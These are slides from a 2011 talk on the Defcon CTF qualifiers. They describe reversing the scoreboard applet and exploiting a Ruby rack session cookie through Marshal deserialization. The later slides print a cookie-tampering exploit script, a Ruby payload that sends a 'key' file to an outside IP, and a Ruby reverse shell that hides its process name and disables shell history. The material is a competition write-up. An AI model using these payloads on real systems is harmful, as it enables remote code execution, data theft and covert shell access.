Talk on Defcon CTF quals done at Ruxmon in June 2011

1. Defcon CTF quals

2. Agenda
● Defcon CTF
● Defcon Quals 2011
● The Score Board
● Powtent Pownable 300

3. Defcon CTF
● One of the most prestigious CTF
● Qualification to get in
● Only 10 teams are qualified
● Run by ddtek

4. Defcon CTF
● You get a FreeBSD box with X
services:
● Reverse each service
● Protect each service
● Attack others' service

5. Defcon CTF
● You get points for:
● Availability
● Reading other teams' keys
● Overwriting other teams' keys
(DEFACED)

7. Defcon CTF quals
● Dates:
● From 03 Jun 2011 19:00:00 UTC
● To 06 Jun 2011 00:00:00 UTC
● 53 non-stop hours

8. Defcon CTF quals
● 5 categories
● 5 challenges per category
● Challenges are progressively
opened

9. FIXME picture of score board

10. The Score Board
● Java applet
● Annoying and slow
● The organisation is late
● Direct openssl connection
doesn't seem to work

11. The Score Board
● Let start reversing with jad
● Class to communicate with the
server:
biz/ddtek/quals/QualsClient.class
● Need to do some patching to
remove UI related instructions

12. The Score Board
● Method to login
● Method to get the matrix of
challenges as an array
● Method to get the details for each
challenge

13. The Score Board
● Build 2 java apps to get score
and to get new challenge
● Build an IRC alert bot for new
challenge
● Fuzz/Try to inject ;)
● And share it with the team

15. Powtent Pownables 300
● Ruby based
● HTTP based:
● Often the case
● No XSS or SQLi
● Just vulnerable and weird web
servers

16. PP300: 2 paths ???
● The version of Webrick seems
vulnerable:
WEBrick/1.3.1 (Ruby/1.8.7/2010-08-16)
● The cookie sent is identical
between 2 HTTP requests
without cookies...

17. Set-Cookie: rack.session=
BAh7CSIlZU5wajRZam1VVEpUSUJiRTYraXE2cXZXY0NsWkVLdGMiAYhlTnBq
%0ANFlqbVVUSlRJQmJFNitpcTZxdldjQ2xaRUt0Y0hVVEg2T3VyeGhDakNhWUJy
%0ARWxWdjBhVnNDWjlJTlFFNndWcTFnWHlpYkVwSmo1ZUgyU1hxb2FxZ29LMWdv
%0AS3FKdEFtWW9OQk5VWlZCMHh4S1prUUhYTHF1cnFxNmx3QWRoODBBZz09IiVl
%0ATnFWbEQxdXd6QU1oWmNPUlE1UkVGbHFGMUE0QnVqUSIC8AFlTnFWbEQxdXd6%0
AQU1oWmNPUlE1UkVGbHFGMUE0QnVqUUpjY29BZHFENGRGRE1tUWdmUFpLbEtp
%0AZjJFRVJEN1lsOFluaysyUy92ZjkrSE05Zk1NTUNJOXpnQ2hQYzRkL3g0WGll
%0ANGJWcjlwb0ZVTitwV1dsR1dNOHNYak5LR3NnemtUU1AwV3R1Rmp1Y0dwRnMz
%0AcjcxZnZPYTZ3QzdpZktJMmtLdVhqUGxNaVIxcGcwUWhXbm5tSUdvVGpSNXpU
%0AM1hUa0hDenExcnliWUdsYVFJVFhRL0JENUZ4RzdkczNkMVRGbVQrUkMzWnZI
%0ASnBldkVlbWxUVXZoVTRSUWpFSUhCUC8yOTQ0NzVKNjVMNWxNQjhXNWZRbXdQ
%0ARU1WUm9pSkpiSldQZVVXNmoycTRSOXRJSmFwaExIek1YdFNhTHhyVEZ5UmRs
%0AS2ovaFk5WjBvWG1rOFlhODdHK042ek9aT0pqN1ZHb0lEaElTUkx0NkppeDVE
%0AVStrS2lSMVRVRW0vVWNmRDRlcU14SE1xS0loOWxRWVQyTlB0RDR0S2N6Rmkr
%0AMk1iV0pqTS9PaWNhQ2pabzE0eU4xRHR4OFBZM0krTWlqUk8xQTR1Ull0YWNr
%0AUHZMWVM0N2JmdmVTK01qVEwzcEhFL204K24vN0ErYksrK0k9IiVtaDdjSiVo
%0AOTlMUG4xelNvaDQsNDIhNmUzdDc4Q3ddaSIyZU5wajRWQ1N5U2dwS2JEUzF6%0AYz
BNdGN6QUVKREsxTWpDd05EZlFCUi9RWEIKIiVlTnFGME0wS3dqQU1BT0NM
%0AQjluWkJ3alpwQjFzeTkydCICBAFlTnFGME0wS3dqQU1BT0NMQjluWkJ3alpw
%0AQjFzeTkydDBLTlA0TVZLNmhQc0JmTHdwdG9PTjVpbXRCVHk5U2M1SE84bmJH
%0AQTNtTWhXZU43TnozUFErQ1VtSHY0SUNNeUVQd1VSeDJFUm5SOTl0d1lpQk8y
%0AamlGR0JoZURIWlhTc2dFQ0tvQ2RFSDFoeTJuS0t3Y0FpS0MydHYyUkE3MTB0%0AaU
ZoRTdIczBzVHp3dVNrNkYvUlk5ZDNTUkVLZVBxYXZwa2VhOWU5QlVoOENX
%0AR0FXdWNxbUd4bFFxaUU0aDdWeEc2RXBtNEZ5NWh0djd6QUd0VDVkdE5KcFN2%0A
VzIxUXRTcVY1dg%3D%3D%0A

18. PP300: rack cookies
● Base64 encoding of Marshall
objects
● Marshall =~ Serialization
z= Marshal.load(Base64.decode64(URI.decode(cookie)))

19. > z= Marshal.load(Base64.decode64(URI.decode(cookie)))
> pp z.class
Hash
> pp z
{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>
"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq
1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" =>
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",
"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" =>
"eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXBn",
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" =>
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc
5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgE
CKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpke
a9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}
z= Marshal.load(Base64.decode64(URI.decode(cookie)))

20. How to lose an hour :/
{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>
"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq
1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" =>
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",
"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" =>
"eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXBn",
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" =>
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc
5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgE
CKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpke
a9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}
z= Marshal.load(Base64.decode64(URI.decode(cookie)))

21. All values start with eN...
> s="eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE
6WVq1gXyibEPjj5eH2SXqoaQgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80A
g=="
> Base64.decode64(s).each_byte do |c|
> print "x%02x" % c
> end
x78xdax63xe1x88xe6x51x32x53x20x16xc4xebxe8xaaxeaxab
xd6x70x29x59x10xabx5cx1dx44xc7xe8xebxabxc6x10xa3x09
xa6x01xacx49x55xbfx46x95xb0x26x7dx20xd4x04xe9x6bxea
xd6x05xf2x89xb1x0fx8ex3ex5ex1fx64x97xaax86xaax82x82
xb5x82x82xaax26xd0x26x62x83x41x35x46x55x07x4cx71x29
x99x10x1dx72xeaxbaxbaxaaxeax5cx00x76x1fx34x02
… googling for “x78xda” links to
the zlib

22. After few lines of code
z.each do |p,v|
puts
puts Marshal.load(Zlib::Inflate.new.inflate(Base64.decode64(v)))
end
And you get...

24. [ … ]
[ … ]
http://127.0.0.1:52801/
_//(
oo
<_.
__/"
//_`.
,@;@, ||/ )]
;@;@( @;@;@;@;@;@,_|/ / |
/a `@_|@;@;@;@(_____.' |
/ )@:@;@;@;@/@:@;@#|"""|
`--"'`;@;@;@;@|@;@;@`== )
`;@;;@;;@;@` || |
|| | ( __||H|
|| | // / =="#'=
// ( // / |__V_|
''"' '"'___<<____)
If you follow, there were 4 values...
… I removed the goatse...

25. We need to retrieve a file
named “key”...
inte = "mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i"
url = Marshal.load(Zlib::Inflate.new.inflate(
Base64.decode64(z[inte])))
pp url
url += "key"
zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)
dst = Base64.encode64(zzzz.deflate(Marshal.dump(url), Zlib::FINISH))
zzzz.close
z[inte] = dst
l = TCPSocket.new( "pwn508.ddtek.biz",52719)
s = "#{URI.encode(Base64.encode64(Marshal.dump(z)))}"
lol = "GET / HTTP/1.0rnCookie: rack.session=#{s}rnrn"
puts lol
l.write lol
puts l.read
And we get...

26. NOTHING!!!

27. So we need...
● A web server that responds with a Zlib
compressed response that is base64
encoded
● This response should declare a
function that will read a file or spawn a
shell

28. Request with
crafted cookie
Retrieve code
to exec
Send key or
reverse shell

29. Building the answer: read a file
a = "proc { require 'socket';
TCPSocket.new("95.142.164.253",1235).write(
File.read("key")) }"
zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)
dst = Base64.encode64(zzzz.deflate(a, Zlib::FINISH))
zzzz.close
puts "HTTP/1.1 200 OKrnContent-length: "+dst.size.to_s+"rnrn"
puts dst
Payload for a shell:
a = "proc { require 'socket';$0="ps";
s = Socket.new(Socket::AF_INET,Socket::SOCK_STREAM,
Socket::IPPROTO_TCP);
s.connect(Socket.pack_sockaddr_in(1235, '95.142.164.253'));
[$stdin, $stdout, $stderr].each {|c| c.reopen s};
system("export HISTFILE=/dev/null && /bin/sh -i");
[$stdin, $stdout, $stderr].each {|c| c.close}; }"

30. Conclusion...
● Good fun
● Challenging